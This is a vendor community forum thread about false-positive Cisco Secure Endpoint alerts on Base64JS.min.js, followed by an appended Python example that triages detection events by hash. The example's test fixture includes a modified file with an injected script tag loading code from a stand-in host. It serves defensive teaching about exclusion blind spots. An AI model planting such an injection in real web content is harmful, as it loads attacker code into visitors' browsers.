Base64JS.min.js

noahigros
Level 1

Good afternoon, 

We are using Cisco AMP (connector version 8.2.1.21612) and are receiving numerous alerts for the filename Base64JS.min.js. Is anybody else experiencing this? Previously we had a widespread issue with an smss.exe parent process that was found to be an issue with a new BP update on Cisco's end, for the same connector version we are on now. Could this be related?

21 Replies

Roman Valenta
Cisco Employee

The statement above is correct. I just checked the internal ticket with TALOS, and it was confirmed last night around 7 pm EST that this is indeed an FP event and that it will be removed from the detection list.

dotran
Level 1

I entered that hash into Talos and it still shows as UNKNOWN.

noahigros
Level 1

Final thoughts:

Although we now have an accepted solution, for future reference you can also create an exclusion for events like this and apply it to your group policies. I personally don't tend to do that, as there is always the possibility that these events are true positives and I wouldn't want to miss them. I've only done exclusions for the very specific needs of an agency, not for an overarching file or action that's common across the board.

That's what we did, but we would prefer that Cisco make a public announcement and provide the updated signature files so that paying customers do not have to do any guesswork.

Absolutely agree.

I do 100% agree with this statement. Secure Endpoint is definitely not a "one click" solution; there are many engines and factors that play a big role in the final verdict, and you have the power to control most of them. I also agree that FP events can be annoying and distracting, but again, SE is not just a simple AV solution, and in today's world I would rather be safe than sorry.

Also remember that for any doubts you have about a False Positive or False Negative event, TAC is here to help you, and we treat these cases individually, case by case. Most of them are resolved within 24 hours of reporting, but there are cases, like those caused by the Exploit Prevention engine, that are far more complicated than a simple detection, and those can take longer. So we appreciate the patience and support.

Agreed, and we greatly appreciate the help from the Cisco team.
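The thread above weighs a group-policy exclusion for a false positive against the risk of silencing a real hit, and one reply checks the file's hash against Talos. The script below is an added example, not code from the thread or from Cisco: it triages constructed detection events (invented records, loosely modeled on the file name, SHA-256 and host fields a connector export carries) and contrasts an exclusion scoped to verified hashes with one scoped to the file name. The file contents, host names and the `CONFIRMED_BENIGN` allowlist are all assumptions for illustration.

```python
import hashlib
from collections import defaultdict

# --- Constructed sample data (not real Secure Endpoint output) ----------------
# Stand-in bytes for the vendor-distributed Base64JS.min.js and for a copy under
# the same file name that someone has modified. Both are invented for this example.
VENDOR_COPY = b"!function(e){e.Base64={encode:function(s){return btoa(s)}}}(window);\n"
MODIFIED_COPY = VENDOR_COPY + b"document.write('<script src=\"//example.invalid/x.js\"></script>');\n"


def sha256_hex(data: bytes) -> str:
    """SHA-256 of a byte string as lowercase hex, the form a Talos hash lookup takes."""
    return hashlib.sha256(data).hexdigest()


# One constructed record per host and file, as a detection export might list them.
SAMPLE_EVENTS = [
    {"host": "ws-01", "file_name": "Base64JS.min.js", "sha256": sha256_hex(VENDOR_COPY)},
    {"host": "ws-02", "file_name": "Base64JS.min.js", "sha256": sha256_hex(VENDOR_COPY)},
    {"host": "ws-03", "file_name": "Base64JS.min.js", "sha256": sha256_hex(VENDOR_COPY)},
    {"host": "ws-07", "file_name": "Base64JS.min.js", "sha256": sha256_hex(MODIFIED_COPY)},
]

# Hashes an analyst has confirmed benign, e.g. by hashing the copy taken from the
# vendor's package. Assumption for this example: only the vendor stand-in is confirmed.
CONFIRMED_BENIGN = {sha256_hex(VENDOR_COPY)}


def triage(events, benign_hashes):
    """Group events by SHA-256 and label each hash.

    Returns {sha256: {"hosts": [...], "file_names": [...], "verdict": str}}.
    A hash on the confirmed list is 'benign'; anything else is 'review', even
    when its file name matches a file that is known-good elsewhere.
    """
    groups = defaultdict(lambda: {"hosts": set(), "file_names": set()})
    for ev in events:
        g = groups[ev["sha256"].lower()]
        g["hosts"].add(ev["host"])
        g["file_names"].add(ev["file_name"])
    return {
        h: {
            "hosts": sorted(g["hosts"]),
            "file_names": sorted(g["file_names"]),
            "verdict": "benign" if h in benign_hashes else "review",
        }
        for h, g in groups.items()
    }


def hash_exclusions(summary):
    """Exclusions scoped to a hash: only hashes verified benign get suppressed."""
    return sorted(h for h, info in summary.items() if info["verdict"] == "benign")


def suppressed_by_name_exclusion(events, benign_hashes, file_name):
    """Count what an exclusion keyed on the file name alone would silence,
    split into (verified, unverified). The unverified count is the blind spot
    such an exclusion opens: a modified file under the same name disappears too.
    """
    verified = unverified = 0
    for ev in events:
        if ev["file_name"] != file_name:
            continue
        if ev["sha256"].lower() in benign_hashes:
            verified += 1
        else:
            unverified += 1
    return verified, unverified


if __name__ == "__main__":
    summary = triage(SAMPLE_EVENTS, CONFIRMED_BENIGN)
    for h, info in summary.items():
        print(f"{h[:16]}...  {info['verdict']:6}  hosts={info['hosts']}")
    print("hash-scoped exclusions:", [h[:16] + "..." for h in hash_exclusions(summary)])
    print("file-name exclusion would hide (verified, unverified):",
          suppressed_by_name_exclusion(SAMPLE_EVENTS, CONFIRMED_BENIGN, "Base64JS.min.js"))
```

On the constructed data the vendor hash is seen on three hosts and is the only one an exclusion should cover; the fourth host carries a different hash under the same name and stays in the review queue, which a name-based exclusion would have hidden along with the rest.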